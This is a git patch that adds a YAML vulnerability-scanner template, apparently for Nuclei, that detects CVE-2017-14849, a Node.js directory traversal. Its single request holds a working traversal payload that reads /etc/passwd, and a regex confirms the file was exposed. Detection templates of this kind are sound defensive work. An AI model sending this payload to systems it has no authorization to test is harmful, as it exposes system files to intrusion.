From 394d2e37cfdcc155739ff8fc8372057b3a3dfaee Mon Sep 17 00:00:00 2001 From: Robbie Date: Wed, 19 Aug 2020 16:34:31 +0100 Subject: [PATCH] Create CVE-2017-14849.yaml --- cves/CVE-2017-14849.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cves/CVE-2017-14849.yaml diff --git a/cves/CVE-2017-14849.yaml b/cves/CVE-2017-14849.yaml new file mode 100644 index 0000000000..83da100eb5 --- /dev/null +++ b/cves/CVE-2017-14849.yaml @@ -0,0 +1,20 @@ +id: CVE-2017-14849 + +info: + name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal + author: Random-Robbie + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}/static/../../../a/../../../../etc/passwd" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:[x*]:0:0:" + part: body